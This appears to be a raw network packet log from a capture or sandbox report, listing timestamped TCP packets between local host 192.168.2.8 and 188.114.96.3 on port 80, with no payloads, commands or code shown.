                                Aug 27, 2024 09:49:41.774108887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774111986 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774122000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774135113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774146080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774147987 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774158955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774169922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774173021 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774183989 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774203062 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774223089 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774224997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774236917 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774250031 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774266958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774279118 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774282932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774303913 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774322987 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774336100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774346113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774358034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774362087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774386883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774436951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774447918 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774471045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774476051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774482965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774492979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774518013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774539948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774580956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774590969 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774601936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774614096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774626017 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774626017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774637938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774651051 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774691105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774710894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774777889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774790049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774821043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774847984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774859905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774871111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774883032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774897099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.774898052 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774930000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.774944067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775266886 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775278091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775289059 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775319099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775434017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775445938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775455952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775468111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775477886 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775480986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775502920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775523901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775525093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775536060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775546074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775582075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775747061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775758982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775768995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775782108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775794983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775799036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775806904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775814056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775820017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775831938 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775835991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775846958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775860071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775867939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775871992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775883913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775890112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775907040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.775932074 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.775942087 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.776597977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776611090 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776627064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776638985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776654005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.776657104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776669025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776679993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776680946 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.776690960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776716948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.776721954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776734114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776745081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.776763916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.776798010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.777504921 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777514935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777525902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777539015 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777549982 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777563095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777561903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.777574062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777585983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777596951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777606964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.777606964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.777606964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.777610064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777622938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777632952 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.777633905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777646065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.777658939 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.777677059 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.778007984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778019905 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778033018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778047085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778059006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778062105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.778089046 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.778121948 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778134108 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778142929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778153896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778166056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778172016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778175116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.778183937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778196096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778199911 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.778213978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778218985 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.778228045 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778239012 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.778254032 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.778271914 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.778388023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.817625046 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.817639112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.817651033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.817662954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.817687988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.817701101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.817878008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.817960978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.817986965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.818025112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861119032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861148119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861160994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861181974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861196041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861207008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861208916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861208916 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861218929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861231089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861242056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861242056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861253023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861268044 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861268997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861284018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861313105 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861422062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861434937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861447096 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861460924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861479998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861489058 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861493111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861512899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861519098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861526966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861538887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861540079 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861552000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861565113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861567974 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861577034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861589909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861608028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861613035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861627102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861637115 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861638069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861649990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861654043 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861661911 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861679077 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861705065 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861777067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861788034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861799002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861815929 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861828089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861833096 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861840010 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861850977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861867905 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861871004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861882925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861896038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861897945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861907005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861927986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861938953 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861939907 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861953020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.861979008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.861989975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862000942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862013102 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862027884 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862051010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862569094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862580061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862600088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862611055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862618923 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862623930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862639904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862653017 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862663984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862667084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862677097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862692118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862709045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862741947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862755060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862766027 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862778902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862787962 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862802982 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862900019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862911940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862922907 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862935066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862943888 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862946033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862962961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862962961 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.862976074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.862982035 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863007069 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863018036 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863018990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863030910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863055944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863085032 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863097906 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863109112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863121033 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863132954 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863135099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863146067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863158941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863171101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863286972 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863298893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863311052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863331079 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863343000 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863348007 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863353968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863354921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863365889 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863379002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863394976 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.863395929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863423109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.863434076 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.864531040 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.864562035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.864573956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.864604950 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.864631891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.864645004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.864656925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.864670038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.864675045 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.864702940 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865021944 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865035057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865046978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865067959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865089893 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865096092 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865102053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865115881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865147114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865154028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865166903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865196943 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865248919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865261078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865271091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865283966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865295887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865303040 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865325928 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865346909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865386963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865401030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865412951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865425110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865437984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865437984 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865453005 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865463972 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865464926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865492105 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865495920 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.865508080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.865541935 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.904829979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.904879093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.904891968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.904905081 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.904917955 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.904931068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.904934883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.904943943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.904973984 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.905025959 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.948762894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948781967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948796034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948868990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:41.948873997 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948890924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948904991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948916912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948930979 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:41.948931932 CEST4971580192.168.2.8188.114.96.3
